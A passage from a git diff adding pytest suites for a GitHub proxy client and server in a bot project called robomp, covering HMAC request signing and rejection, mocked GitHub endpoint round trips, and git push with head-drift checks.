httpx.ASGITransport (which is async-only). +# Bridge by running the async transport inside a one-shot event loop per call. +class _SyncASGIBridge(httpx.BaseTransport): + def __init__(self, app) -> None: + self._async = httpx.ASGITransport(app=app) + + def handle_request(self, request: httpx.Request) -> httpx.Response: # type: ignore[override] + async def _drain() -> tuple[int, httpx.Headers, bytes]: + async_resp = await self._async.handle_async_request(request) + body = await async_resp.aread() + await async_resp.aclose() + return async_resp.status_code, async_resp.headers, body + + status, headers, body = asyncio.run(_drain()) + # Wrap the bytes in a fresh sync Response so httpx.Client's + # `isinstance(response.stream, SyncByteStream)` assertion holds. + return httpx.Response( + status_code=status, + headers=headers, + content=body, + request=request, + ) + + +# ============================================================================ +# 1. HMAC headers + signature verify +# ============================================================================ + + +async def test_signed_headers_present_and_verify() -> None: + captured: list[httpx.Request] = [] + + def handler(request: httpx.Request) -> httpx.Response: + captured.append(request) + # Echo a minimal valid payload for whichever endpoint was hit. + return httpx.Response( + 200, + json={ + "full_name": "octo/widget", + "default_branch": "main", + "clone_url": "https://example/octo/widget.git", + "private": False, + }, + ) + + client = GitHubProxyClient( + base_url="http://proxy.test", + hmac_key=_HMAC, + transport=httpx.MockTransport(handler), + ) + info = await client.get_repo("octo/widget") + assert isinstance(info, RepoInfo) + assert len(captured) == 1 + req = captured[0] + ts = req.headers.get(HEADER_TIMESTAMP) + sig = req.headers.get(HEADER_SIGNATURE) + assert ts is not None and sig is not None + raw_query = req.url.query.decode("ascii") + target = f"{req.url.path}?{raw_query}" if raw_query else req.url.path + result = verify( + method=req.method, + path=target, + body=req.content or b"", + timestamp=ts, + signature=sig, + key=_HMAC_BYTES, + ) + assert result.ok, result.reason + + +# ============================================================================ +# 2. Round-trip via ASGI against a real proxy app +# ============================================================================ + + +@pytest.fixture +def round_trip_app(proxy_settings: Settings): + """A proxy app whose GitHub-side `app.state.github` answers every GH + endpoint the GitHubProxyClient exercises in the round-trip test.""" + app = create_proxy_app(proxy_settings) + app.state.settings = proxy_settings + + def gh(req: httpx.Request) -> httpx.Response: + path = req.url.path + if path == "/repos/octo/widget": + return httpx.Response( + 200, + json={ + "full_name": "octo/widget", + "default_branch": "main", + "clone_url": "https://example/octo/widget.git", + "private": False, + }, + ) + if path == "/repos/octo/widget/issues/1" and req.method == "GET": + return httpx.Response( + 200, + json={ + "number": 1, + "title": "T", + "body": "B", + "state": "open", + "user": {"login": "alice"}, + "labels": [{"name": "bug"}], + }, + ) + if path == "/repos/octo/widget/issues" and req.method == "GET": + return httpx.Response( + 200, + json=[ + { + "number": 1, + "title": "first", + "state": "open", + "user": {"login": "alice"}, + "labels": [], + "comments": 0, + "updated_at": "2026-01-01T00:00:00Z", + "created_at": "2026-01-01T00:00:00Z", + "html_url": "https://example/1", + } + ], + ) + if path == "/repos/octo/widget/issues/1/comments" and req.method == "GET": + return httpx.Response( + 200, + json=[ + {"id": 7, "user": {"login": "u"}, "body": "hi", "created_at": "2026-01-01T00:00:00Z"}, + ], + ) + if path == "/repos/octo/widget/issues/1/comments" and req.method == "POST": + return httpx.Response( + 201, + json={"id": 11, "user": {"login": "bot"}, "body": "posted", "created_at": "2026-01-01T00:00:00Z"}, + ) + if path == "/repos/octo/widget/pulls/2/comments": + return httpx.Response( + 200, + json=[ + { + "id": 9, + "user": {"login": "rev"}, + "body": "nit", + "path": "a.py", + "line": 5, + "created_at": "2026-01-01T00:00:00Z", + } + ], + ) + if path == "/repos/octo/widget/pulls/2/reviews": + return httpx.Response( + 200, + json=[ + { + "id": 12, + "user": {"login": "rev"}, + "body": "approved", + "state": "APPROVED", + "submitted_at": "2026-01-01T00:00:00Z", + } + ], + ) + if path == "/user": + return httpx.Response(200, json={"login": "robomp-bot"}) + if path == "/repos/octo/widget/pulls/4" and req.method == "GET": + return httpx.Response( + 200, + json={ + "number": 4, + "html_url": "https://example/4", + "head": {"ref": "feat", "repo": {"full_name": "octo/widget"}}, + "base": {"ref": "main"}, + "state": "open", + "user": {"login": "robomp-bot"}, + }, + ) + if path == "/repos/octo/widget/pulls" and req.method == "POST": + return httpx.Response( + 201, + json={ + "number": 4, + "html_url": "https://example/4", + "head": {"ref": "feat"}, + "base": {"ref": "main"}, + "state": "open", + }, + ) + if path == "/repos/octo/widget/pulls/4/requested_reviewers": + return httpx.Response(201, json={}) + if path == "/repos/octo/widget/issues/1/labels": + return httpx.Response(200, json=[{"name": "triage"}]) + if path == "/repos/octo/widget/issues/1/assignees": + return httpx.Response(201, json={}) + return httpx.Response(404, json={"message": f"unrouted {req.method} {path}"}) + + _attach_gh(app, gh) + return app + + +async def test_round_trip_all_endpoints(round_trip_app) -> None: + client = GitHubProxyClient( + base_url="http://proxy.test", + hmac_key=_HMAC, + transport=httpx.ASGITransport(app=round_trip_app), + ) + repo = await client.get_repo("octo/widget") + assert isinstance(repo, RepoInfo) + assert repo.full_name == "octo/widget" + + issue = await client.get_issue("octo/widget", 1) + assert isinstance(issue, IssueInfo) + assert issue.labels == ("bug",) + + issues = await client.list_issues("octo/widget") + assert len(issues) == 1 and isinstance(issues[0], IssueSummary) + + comments = await client.list_comments("octo/widget", 1) + assert len(comments) == 1 and isinstance(comments[0], CommentInfo) + + rcs = await client.list_review_comments("octo/widget", 2) + assert len(rcs) == 1 and isinstance(rcs[0], ReviewCommentInfo) + assert rcs[0].line == 5 + + prs = await client.list_pr_reviews("octo/widget", 2) + assert len(prs) == 1 and isinstance(prs[0], PullRequestReviewInfo) + + assert await client.get_authenticated_login() == "robomp-bot" + + existing_pr = await client.get_pull_request("octo/widget", 4) + assert isinstance(existing_pr, PullRequestInfo) + assert existing_pr.head_ref == "feat" + assert existing_pr.author == "robomp-bot" + + posted = await client.post_comment("octo/widget", 1, "hi") + assert isinstance(posted, CommentInfo) + assert posted.id == 11 + + pr = await client.open_pull_request(repo="octo/widget", head="feat", base="main", title="t", body="b") + assert isinstance(pr, PullRequestInfo) + assert pr.number == 4 + + # request_reviewers returns None on success. + assert await client.request_reviewers(repo="octo/widget", pr_number=4, reviewers=["alice"]) is None + + labels = await client.add_issue_labels("octo/widget", 1, ["triage"]) + assert labels == ("triage",) + + assert await client.add_assignees("octo/widget", 1, ["alice"]) is None + + +async def test_list_comment_reactions_round_trip(proxy_settings: Settings) -> None: + app = create_proxy_app(proxy_settings) + app.state.settings = proxy_settings + + def gh(req: httpx.Request) -> httpx.Response: + if req.url.path == "/repos/octo/widget/issues/comments/999/reactions": + assert req.url.params.get("content") == "-1" + return httpx.Response( + 200, + json=[ + {"content": "-1", "user": {"login": "alice", "type": "User"}}, + ], + ) + return httpx.Response(404, json={"message": "unrouted"}) + + _attach_gh(app, gh) + client = GitHubProxyClient( + base_url="http://proxy.test", + hmac_key=_HMAC, + transport=httpx.ASGITransport(app=app), + ) + reactions = await client.list_comment_reactions("octo/widget", 999) + assert reactions == (ReactionInfo(content="-1", user_login="alice", user_type="User"),) + + +async def test_close_issue_round_trip(proxy_settings: Settings) -> None: + captured: dict[str, object] = {} + app = create_proxy_app(proxy_settings) + app.state.settings = proxy_settings + + def gh(req: httpx.Request) -> httpx.Response: + if req.url.path == "/repos/octo/widget/issues/7" and req.method == "PATCH": + captured["body"] = json.loads(req.content) + return httpx.Response(200, json={}) + return httpx.Response(404, json={"message": "unrouted"}) + + _attach_gh(app, gh) + client = GitHubProxyClient( + base_url="http://proxy.test", + hmac_key=_HMAC, + transport=httpx.ASGITransport(app=app), + ) + assert await client.close_issue("octo/widget", 7) is None + assert captured["body"] == {"state": "closed", "state_reason": "completed"} + + +# ============================================================================ +# 3. Error decode +# ============================================================================ + + +async def test_error_decode_github_422() -> None: + def handler(_: httpx.Request) -> httpx.Response: + return httpx.Response( + 422, + json={"error": {"kind": "github", "status": 422, "message": "x"}}, + ) + + client = GitHubProxyClient( + base_url="http://proxy.test", + hmac_key=_HMAC, + transport=httpx.MockTransport(handler), + ) + with pytest.raises(GitHubError) as exc: + await client.post_comment("octo/widget", 1, "hi") + assert exc.value.status == 422 + assert exc.value.message == "x" + + +# ============================================================================ +# 4 + 5. ProxyGitTransport push (happy + HEAD drift) +# ============================================================================ + + +def test_proxy_git_transport_push_happy(proxy_settings: Settings, upstream_repo: Path) -> None: + branch = "farm/abc/feat" + _, head = _stage_workspace(proxy_settings, upstream_repo, "octo/widget", 1, branch) + app = create_proxy_app(proxy_settings) + app.state.settings = proxy_settings + _attach_gh(app, lambda _: httpx.Response(500, json={"message": "should not be hit"})) + + transport = ProxyGitTransport( + base_url="http://proxy.test", + hmac_key=_HMAC, + transport=_SyncASGIBridge(app), + ) + result = transport.push_branch( + repo="octo/widget", + workspace_key=workspace_key("octo/widget", 1), + repo_dir=Path(proxy_settings.workspace_root) / workspace_key("octo/widget", 1) / "repo", + branch=branch, + expected_head=head, + ) + assert result.head == head + assert result.branch == branch + assert _bare_has_branch(upstream_repo, branch) + + +def test_proxy_git_transport_push_head_drift(proxy_settings: Settings, upstream_repo: Path) -> None: + branch = "farm/abc/drift" + _, _ = _stage_workspace(proxy_settings, upstream_repo, "octo/widget", 1, branch) + app = create_proxy_app(proxy_settings) + app.state.settings = proxy_settings + _attach_gh(app, lambda _: httpx.Response(500, json={"message": "should not be hit"})) + + transport = ProxyGitTransport( + base_url="http://proxy.test", + hmac_key=_HMAC, + transport=_SyncASGIBridge(app), + ) + with pytest.raises(HeadDriftError): + transport.push_branch( + repo="octo/widget", + workspace_key=workspace_key("octo/widget", 1), + repo_dir=Path(proxy_settings.workspace_root) / workspace_key("octo/widget", 1) / "repo", + branch=branch, + expected_head="0" * 40, + ) + assert not _bare_has_branch(upstream_repo, branch) + + +def test_proxy_git_transport_push_slot_uid_body() -> None: + captured: list[dict[str, object]] = [] + + def handler(request: httpx.Request) -> httpx.Response: + captured.append(json.loads(request.content)) + return httpx.Response(200, json={"head": "abc123", "branch": "farm/abc/feat"}) + + transport = ProxyGitTransport( + base_url="http://proxy.test", + hmac_key=_HMAC, + transport=httpx.MockTransport(handler), + ) + transport.push_branch( + repo="octo/widget", + workspace_key="octo__widget__1", + repo_dir=Path("/unused"), + branch="farm/abc/feat", + expected_head="abc123", + slot_uid=2001, + ) + transport.push_branch( + repo="octo/widget", + workspace_key="octo__widget__1", + repo_dir=Path("/unused"), + branch="farm/abc/feat", + expected_head="abc123", + ) + + assert captured[0]["slot_uid"] == 2001 + assert "slot_uid" not in captured[1] + + +# Sanity: signed POST headers from ProxyGitTransport._post verify cleanly. +def test_proxy_git_transport_post_headers_verify() -> None: + captured: list[httpx.Request] = [] + + def handler(request: httpx.Request) -> httpx.Response: + captured.append(request) + return httpx.Response(200, json={"pool_dir": "/tmp/x"}) + + transport = ProxyGitTransport( + base_url="http://proxy.test", + hmac_key=_HMAC, + transport=httpx.MockTransport(handler), + ) + transport.clone_pool( + repo="octo/widget", + clone_url="https://example/widget.git", + default_branch="main", + target=Path("/tmp/unused"), + ) + assert len(captured) == 1 + req = captured[0] + ts = req.headers.get(HEADER_TIMESTAMP) + sig = req.headers.get(HEADER_SIGNATURE) + assert ts and sig + result = verify( + method="POST", + path="/gh/v1/git/clone", + body=req.content or b"", + timestamp=ts, + signature=sig, + key=_HMAC_BYTES, + ) + assert result.ok, result.reason + assert json.loads(req.content)["repo"] == "octo/widget" diff --git a/python/robomp/tests/test_proxy_server.py b/python/robomp/tests/test_proxy_server.py new file mode 100644 index 000000000..094193dbb --- /dev/null +++ b/python/robomp/tests/test_proxy_server.py @@ -0,0 +1,993 @@ +"""HMAC + endpoint coverage for the gh-proxy FastAPI app.""" + +from __future__ import annotations + +import os +import platform +import subprocess +import time +from collections.abc import Callable +from pathlib import Path + +import httpx +import pytest +from pydantic import SecretStr + +from robomp.config import Settings +from robomp.github_client import GitHubClient +from robomp.proxy.server import create_proxy_app +from robomp.proxy_hmac import HEADER_SIGNATURE, HEADER_TIMESTAMP, sign +from robomp.sandbox import workspace_key + +_HMAC = "test-hmac-key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +_TOKEN = "ghp_test_token_value" + + +# ---------- shared fixtures ---------- + + +def _build_settings(tmp_path: Path) -> Settings: + """Construct a Settings object for the proxy side without going through + the orchestrator-mode mutual-exclusion validator (the proxy reads token + + hmac key directly; the validator is geared at orchestrator deployments).""" + cfg = Settings.model_construct( + github_token=SecretStr(_TOKEN), + github_webhook_secret=SecretStr("webhook-secret"), + bot_login="robomp-bot", + git_author_email="robomp-bot@example.invalid", + repo_allowlist_raw="octo/widget", + gh_proxy_url=None, + gh_proxy_hmac_key=SecretStr(_HMAC), + gh_proxy_bind_host="0.0.0.0", + gh_proxy_bind_port=8081, + workspace_root=tmp_path / "workspaces", + sqlite_path=tmp_path / "robomp.sqlite", + log_dir=tmp_path / "logs", + ) + cfg.ensure_paths() + return cfg + + +@pytest.fixture +def proxy_settings(tmp_path: Path) -> Settings: + return _build_settings(tmp_path) + + +def _git(args: list[str], cwd: Path) -> subprocess.CompletedProcess[str]: + return subprocess.run( + ["git", *args], + cwd=str(cwd), + check=True, + capture_output=True, + text=True, + env=os.environ + | { + "GIT_AUTHOR_NAME": "t", + "GIT_AUTHOR_EMAIL": "t@t", + "GIT_COMMITTER_NAME": "t", + "GIT_COMMITTER_EMAIL": "t@t", + }, + ) + + +@pytest.fixture +def upstream_repo(tmp_path: Path) -> Path: + """Bare local repo with one commit on `main`.""" + repo = tmp_path / "upstream.git" + repo.mkdir() + _git(["init", "--initial-branch=main", "--bare", str(repo)], tmp_path) + seed = tmp_path / "seed" + seed.mkdir() + _git(["init", "--initial-branch=main", str(seed)], tmp_path) + (seed / "README.md").write_text("hello\n", encoding="utf-8") + _git(["-C", str(seed), "add", "."], tmp_path) + _git(["-C", str(seed), "commit", "-m", "init"], tmp_path) + _git(["-C", str(seed), "remote", "add", "origin", str(repo)], tmp_path) + _git(["-C", str(seed), "push", "origin", "main"], tmp_path) + return repo + + +def _stage_workspace(cfg: Settings, upstream: Path, repo: str, number: int, branch: str) -> tuple[Path, str]: + """Pre-stage a workspace clone with one new commit on `branch`.""" + ws_dir = Path(cfg.workspace_root) / workspace_key(repo, number) + ws_dir.mkdir(parents=True, exist_ok=True) + repo_dir = ws_dir / "repo" + _git(["clone", str(upstream), str(repo_dir)], ws_dir) + _git(["-C", str(repo_dir), "config", "user.email", "t@t"], ws_dir) + _git(["-C", str(repo_dir), "config", "user.name", "t"], ws_dir) + _git(["-C", str(repo_dir), "checkout", "-b", branch], ws_dir) + (repo_dir / "x.txt").write_text("x", encoding="utf-8") + _git(["-C", str(repo_dir), "add", "."], ws_dir) + _git(["-C", str(repo_dir), "commit", "-m", "x"], ws_dir) + proc = _git(["-C", str(repo_dir), "rev-parse", "HEAD"], ws_dir) + return repo_dir, proc.stdout.strip() + + +def _bare_has_branch(bare: Path, branch: str) -> bool: + proc = subprocess.run( + ["git", "-C", str(bare), "branch", "--list", branch], + capture_output=True, + text=True, + check=False, + ) + return bool(proc.stdout.strip()) + + +# ---------- HMAC + signed request helpers ---------- + + +def _signed( + method: str, + path: str, + body: bytes = b"", + *, + params: dict[str, object] | None = None, + ts: str | None = None, + key: bytes | None = None, +) -> dict[str, str]: + """Build signed headers. + + When `params` is supplied, the canonical signing target becomes + `path?` (matching the verifier's request-target reconstruction), + so signed requests with query strings stay verifiable AND mutating any + query parameter post-sign produces a 401. + """ + if params: + url = httpx.URL(path, params=params) + query = url.query.decode("ascii") if url.query else "" + target = f"{path}?{query}" if query else path + else: + target = path + timestamp, sig = sign(method=method, path=target, body=body, key=key or _HMAC.encode(), timestamp=ts) + return {HEADER_TIMESTAMP: timestamp, HEADER_SIGNATURE: sig} + + +def _build_app(cfg: Settings, gh_handler: Callable[[httpx.Request], httpx.Response] | None = None): + app = create_proxy_app(cfg) + transport = httpx.MockTransport(gh_handler) if gh_handler is not None else None + app.state.github = GitHubClient(_TOKEN, transport=transport) + app.state.settings = cfg + return app + + +async def _async_client(app) -> httpx.AsyncClient: + return httpx.AsyncClient( + transport=httpx.ASGITransport(app=app), + base_url="http://proxy.test", + ) + + +def test_read_origin_url_uses_safe_directory_and_slot_identity(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: + from robomp.proxy import server as proxy_server + + captured: dict[str, object] = {} + repo_dir = tmp_path / "repo" + + def fake_run(cmd: list[str], **kwargs: object) -> subprocess.CompletedProcess[str]: + captured["cmd"] = cmd + captured.update(kwargs) + return subprocess.CompletedProcess(cmd, 0, "https://github.com/octo/widget.git\n", "") + + monkeypatch.setattr("robomp.proxy.server.subprocess.run", fake_run) + monkeypatch.setattr( + "robomp.proxy.server._slot_subprocess_kwargs", + lambda uid: {"user": uid, "group": uid, "extra_groups": [2000], "umask": 0o002}, + ) + + assert proxy_server._read_origin_url(repo_dir, slot_uid=2001) == "https://github.com/octo/widget.git" + + env = captured["env"] + assert isinstance(env, dict) + assert env["GIT_CONFIG_COUNT"] == "1" + assert env["GIT_CONFIG_KEY_0"] == "safe.directory" + assert env["GIT_CONFIG_VALUE_0"] == str(repo_dir) + assert captured["user"] == 2001 + assert captured["group"] == 2001 + assert captured["extra_groups"] == [2000] + assert captured["umask"] == 0o002 + + +# ============================================================================ +# HMAC behavior +# ============================================================================ + + +async def test_hmac_accept_post_comment_round_trip(proxy_settings: Settings) -> None: + captured: dict[str, httpx.Request] = {} + + def gh(req: httpx.Request) -> httpx.Response: + captured["req"] = req + return httpx.Response( + 201, + json={ + "id": 42, + "user": {"login": "robomp-bot"}, + "body": "hello", + "created_at": "2026-01-01T00:00:00Z", + }, + ) + + app = _build_app(proxy_settings, gh) + body = b'{"repo":"octo/widget","number":1,"body":"hello"}' + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/post_comment", + content=body, + headers={**_signed("POST", "/gh/v1/post_comment", body), "Content-Type": "application/json"}, + ) + assert resp.status_code == 200 + assert resp.json() == {"id": 42, "author": "robomp-bot", "body": "hello", "created_at": "2026-01-01T00:00:00Z"} + assert captured["req"].url.path == "/repos/octo/widget/issues/1/comments" + + +async def test_hmac_reject_missing_headers(proxy_settings: Settings) -> None: + app = _build_app(proxy_settings, lambda _: httpx.Response(200, json={})) + async with await _async_client(app) as client: + resp = await client.get("/gh/v1/repo", params={"repo": "octo/widget"}) + assert resp.status_code == 401 + + +async def test_hmac_reject_bad_signature(proxy_settings: Settings) -> None: + app = _build_app(proxy_settings, lambda _: httpx.Response(200, json={})) + async with await _async_client(app) as client: + resp = await client.get( + "/gh/v1/repo", + params={"repo": "octo/widget"}, + headers={HEADER_TIMESTAMP: str(int(time.time())), HEADER_SIGNATURE: "0" * 64}, + ) + assert resp.status_code == 401 + + +async def test_hmac_reject_stale_timestamp(proxy_settings: Settings) -> None: + app = _build_app(proxy_settings, lambda _: httpx.Response(200, json={})) + stale = str(int(time.time()) - 120) + headers = _signed("GET", "/gh/v1/repo", ts=stale) + async with await _async_client(app) as client: + resp = await client.get("/gh/v1/repo", params={"repo": "octo/widget"}, headers=headers) + assert resp.status_code == 401 + + +# ============================================================================ +# GET endpoints +# ============================================================================ + + +async def test_get_repo(proxy_settings: Settings) -> None: + def gh(req: httpx.Request) -> httpx.Response: + assert req.url.path == "/repos/octo/widget" + return httpx.Response( + 200, + json={ + "full_name": "octo/widget", + "default_branch": "main", + "clone_url": "https://github.com/octo/widget.git", + "private": False, + }, + ) + + app = _build_app(proxy_settings, gh) + async with await _async_client(app) as client: + resp = await client.get( + "/gh/v1/repo", + params={"repo": "octo/widget"}, + headers=_signed("GET", "/gh/v1/repo", params={"repo": "octo/widget"}), + ) + assert resp.status_code == 200 + assert resp.json() == { + "full_name": "octo/widget", + "default_branch": "main", + "clone_url": "https://github.com/octo/widget.git", + "private": False, + } + + +async def test_get_issue(proxy_settings: Settings) -> None: + def gh(req: httpx.Request) -> httpx.Response: + assert req.url.path == "/repos/octo/widget/issues/1" + return httpx.Response( + 200, + json={ + "number": 1, + "title": "T", + "body": "B", + "state": "open", + "user": {"login": "alice"}, + "labels": [{"name": "bug"}], + }, + ) + + app = _build_app(proxy_settings, gh) + async with await _async_client(app) as client: + resp = await client.get( + "/gh/v1/issue", + params={"repo": "octo/widget", "number": 1}, + headers=_signed("GET", "/gh/v1/issue", params={"repo": "octo/widget", "number": 1}), + ) + assert resp.status_code == 200 + payload = resp.json() + assert payload["repo"] == "octo/widget" + assert payload["number"] == 1 + assert payload["labels"] == ["bug"] + assert payload["is_pull_request"] is False + + +async def test_list_issues(proxy_settings: Settings) -> None: + def gh(req: httpx.Request) -> httpx.Response: + assert req.url.path == "/repos/octo/widget/issues" + return httpx.Response( + 200, + json=[ + { + "number": 1, + "title": "first", + "state": "open", + "user": {"login": "alice"}, + "labels": [{"name": "bug"}], + "comments": 0, + "updated_at": "2026-01-01T00:00:00Z", + "created_at": "2026-01-01T00:00:00Z", + "html_url": "https://example/1", + }, + # A PR — must be filtered out. + { + "number": 2, + "title": "pr", + "pull_request": {"url": "x"}, + "user": {"login": "alice"}, + }, + ], + ) + + app = _build_app(proxy_settings, gh) + async with await _async_client(app) as client: + resp = await client.get( + "/gh/v1/issues", + params={"repo": "octo/widget"}, + headers=_signed("GET", "/gh/v1/issues", params={"repo": "octo/widget"}), + ) + assert resp.status_code == 200 + items = resp.json()["items"] + assert len(items) == 1 + assert items[0]["number"] == 1 + + +async def test_list_comments(proxy_settings: Settings) -> None: + def gh(req: httpx.Request) -> httpx.Response: + assert req.url.path == "/repos/octo/widget/issues/1/comments" + return httpx.Response( + 200, + json=[ + {"id": 1, "user": {"login": "u"}, "body": "hi", "created_at": "2026-01-01T00:00:00Z"}, + ], + ) + + app = _build_app(proxy_settings, gh) + async with await _async_client(app) as client: + resp = await client.get( + "/gh/v1/comments", + params={"repo": "octo/widget", "number": 1}, + headers=_signed("GET", "/gh/v1/comments", params={"repo": "octo/widget", "number": 1}), + ) + assert resp.status_code == 200 + assert resp.json() == { + "items": [{"id": 1, "author": "u", "body": "hi", "created_at": "2026-01-01T00:00:00Z"}], + } + + +async def test_list_review_comments(proxy_settings: Settings) -> None: + def gh(req: httpx.Request) -> httpx.Response: + assert req.url.path == "/repos/octo/widget/pulls/1/comments" + return httpx.Response( + 200, + json=[ + { + "id": 9, + "user": {"login": "rev"}, + "body": "nit", + "path": "a.py", + "line": 5, + "created_at": "2026-01-01T00:00:00Z", + } + ], + ) + + app = _build_app(proxy_settings, gh) + async with await _async_client(app) as client: + resp = await client.get( + "/gh/v1/review_comments", + params={"repo": "octo/widget", "pr_number": 1}, + headers=_signed("GET", "/gh/v1/review_comments", params={"repo": "octo/widget", "pr_number": 1}), + ) + assert resp.status_code == 200 + items = resp.json()["items"] + assert items[0]["path"] == "a.py" + assert items[0]["line"] == 5 + + +async def test_list_pr_reviews(proxy_settings: Settings) -> None: + def gh(req: httpx.Request) -> httpx.Response: + assert req.url.path == "/repos/octo/widget/pulls/1/reviews" + return httpx.Response( + 200, + json=[ + { + "id": 11, + "user": {"login": "rev"}, + "body": "looks good", + "state": "APPROVED", + "submitted_at": "2026-01-01T00:00:00Z", + }, + # Empty body — must be filtered out by GitHubClient. + {"id": 12, "user": {"login": "rev"}, "body": " ", "state": "COMMENTED"}, + ], + ) + + app = _build_app(proxy_settings, gh) + async with await _async_client(app) as client: + resp = await client.get( + "/gh/v1/pr_reviews", + params={"repo": "octo/widget", "pr_number": 1}, + headers=_signed("GET", "/gh/v1/pr_reviews", params={"repo": "octo/widget", "pr_number": 1}), + ) + assert resp.status_code == 200 + items = resp.json()["items"] + assert len(items) == 1 + assert items[0]["state"] == "APPROVED" + + +async def test_authenticated_login(proxy_settings: Settings) -> None: + def gh(req: httpx.Request) -> httpx.Response: + assert req.url.path == "/user" + return httpx.Response(200, json={"login": "robomp-bot"}) + + app = _build_app(proxy_settings, gh) + async with await _async_client(app) as client: + resp = await client.get( + "/gh/v1/authenticated_login", + headers=_signed("GET", "/gh/v1/authenticated_login"), + ) + assert resp.status_code == 200 + assert resp.json() == {"login": "robomp-bot"} + + +# ============================================================================ +# POST endpoints +# ============================================================================ + + +async def test_post_comment_forwards_body(proxy_settings: Settings) -> None: + captured: dict[str, httpx.Request] = {} + + def gh(req: httpx.Request) -> httpx.Response: + captured["req"] = req + return httpx.Response( + 201, + json={"id": 7, "user": {"login": "b"}, "body": "hi", "created_at": "2026-01-01T00:00:00Z"}, + ) + + app = _build_app(proxy_settings, gh) + body = b'{"repo":"octo/widget","number":1,"body":"hi"}' + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/post_comment", + content=body, + headers={**_signed("POST", "/gh/v1/post_comment", body), "Content-Type": "application/json"}, + ) + assert resp.status_code == 200 + req = captured["req"] + assert req.method == "POST" + assert req.url.path == "/repos/octo/widget/issues/1/comments" + import json + + assert json.loads(req.content) == {"body": "hi"} + + +async def test_add_issue_labels(proxy_settings: Settings) -> None: + captured: dict[str, httpx.Request] = {} + + def gh(req: httpx.Request) -> httpx.Response: + captured["req"] = req + return httpx.Response(200, json=[{"name": "triage"}, {"name": "bug"}]) + + app = _build_app(proxy_settings, gh) + body = b'{"repo":"octo/widget","number":1,"labels":["triage","bug"]}' + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/add_issue_labels", + content=body, + headers={**_signed("POST", "/gh/v1/add_issue_labels", body), "Content-Type": "application/json"}, + ) + assert resp.status_code == 200 + assert resp.json() == {"labels": ["triage", "bug"]} + assert captured["req"].url.path == "/repos/octo/widget/issues/1/labels" + import json + + assert json.loads(captured["req"].content) == {"labels": ["triage", "bug"]} + + +async def test_add_assignees(proxy_settings: Settings) -> None: + captured: dict[str, httpx.Request] = {} + + def gh(req: httpx.Request) -> httpx.Response: + captured["req"] = req + return httpx.Response(201, json={}) + + app = _build_app(proxy_settings, gh) + body = b'{"repo":"octo/widget","number":1,"assignees":["alice"]}' + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/add_assignees", + content=body, + headers={**_signed("POST", "/gh/v1/add_assignees", body), "Content-Type": "application/json"}, + ) + assert resp.status_code == 200 + assert resp.json() == {"ok": True} + assert captured["req"].url.path == "/repos/octo/widget/issues/1/assignees" + import json + + assert json.loads(captured["req"].content) == {"assignees": ["alice"]} + + +async def test_comment_reactions(proxy_settings: Settings) -> None: + captured: dict[str, httpx.Request] = {} + + def gh(req: httpx.Request) -> httpx.Response: + captured["req"] = req + return httpx.Response( + 200, + json=[ + {"content": "-1", "user": {"login": "alice", "type": "User"}}, + ], + ) + + app = _build_app(proxy_settings, gh) + target = "/gh/v1/comment_reactions?repo=octo%2Fwidget&comment_id=999" + async with await _async_client(app) as client: + resp = await client.get(target, headers=_signed("GET", target)) + assert resp.status_code == 200 + assert resp.json() == { + "items": [{"content": "-1", "user_login": "alice", "user_type": "User"}], + } + req = captured["req"] + assert req.method == "GET" + assert req.url.path == "/repos/octo/widget/issues/comments/999/reactions" + assert req.url.params.get("content") == "-1" + + +async def test_close_issue(proxy_settings: Settings) -> None: + captured: dict[str, httpx.Request] = {} + + def gh(req: httpx.Request) -> httpx.Response: + captured["req"] = req + return httpx.Response(200, json={}) + + app = _build_app(proxy_settings, gh) + body = b'{"repo":"octo/widget","number":7,"reason":"completed"}' + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/close_issue", + content=body, + headers={**_signed("POST", "/gh/v1/close_issue", body), "Content-Type": "application/json"}, + ) + assert resp.status_code == 200 + assert resp.json() == {"ok": True} + req = captured["req"] + assert req.method == "PATCH" + assert req.url.path == "/repos/octo/widget/issues/7" + import json + + assert json.loads(req.content) == {"state": "closed", "state_reason": "completed"} + + +async def test_close_issue_defaults_reason_to_completed(proxy_settings: Settings) -> None: + captured: dict[str, httpx.Request] = {} + + def gh(req: httpx.Request) -> httpx.Response: + captured["req"] = req + return httpx.Response(200, json={}) + + app = _build_app(proxy_settings, gh) + body = b'{"repo":"octo/widget","number":7}' + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/close_issue", + content=body, + headers={**_signed("POST", "/gh/v1/close_issue", body), "Content-Type": "application/json"}, + ) + assert resp.status_code == 200 + import json + + assert json.loads(captured["req"].content) == {"state": "closed", "state_reason": "completed"} + + +async def test_open_pull_request(proxy_settings: Settings) -> None: + captured: dict[str, httpx.Request] = {} + + def gh(req: httpx.Request) -> httpx.Response: + captured["req"] = req + return httpx.Response( + 201, + json={ + "number": 4, + "html_url": "https://example/4", + "head": {"ref": "feature"}, + "base": {"ref": "main"}, + "state": "open", + }, + ) + + app = _build_app(proxy_settings, gh) + body = ( + b'{"repo":"octo/widget","head":"feature","base":"main",' + b'"title":"t","body":"b","draft":false,"maintainer_can_modify":true}' + ) + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/open_pull_request", + content=body, + headers={**_signed("POST", "/gh/v1/open_pull_request", body), "Content-Type": "application/json"}, + ) + assert resp.status_code == 200 + assert resp.json()["number"] == 4 + assert captured["req"].url.path == "/repos/octo/widget/pulls" + import json + + sent = json.loads(captured["req"].content) + assert sent["head"] == "feature" + assert sent["base"] == "main" + assert sent["title"] == "t" + + +async def test_request_reviewers(proxy_settings: Settings) -> None: + captured: dict[str, httpx.Request] = {} + + def gh(req: httpx.Request) -> httpx.Response: + captured["req"] = req + return httpx.Response(201, json={}) + + app = _build_app(proxy_settings, gh) + body = b'{"repo":"octo/widget","pr_number":4,"reviewers":["alice"],"team_reviewers":null}' + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/request_reviewers", + content=body, + headers={**_signed("POST", "/gh/v1/request_reviewers", body), "Content-Type": "application/json"}, + ) + assert resp.status_code == 200 + assert resp.json() == {"ok": True} + assert captured["req"].url.path == "/repos/octo/widget/pulls/4/requested_reviewers" + import json + + assert json.loads(captured["req"].content) == {"reviewers": ["alice"]} + + +# ============================================================================ +# GitHub error passthrough +# ============================================================================ + + 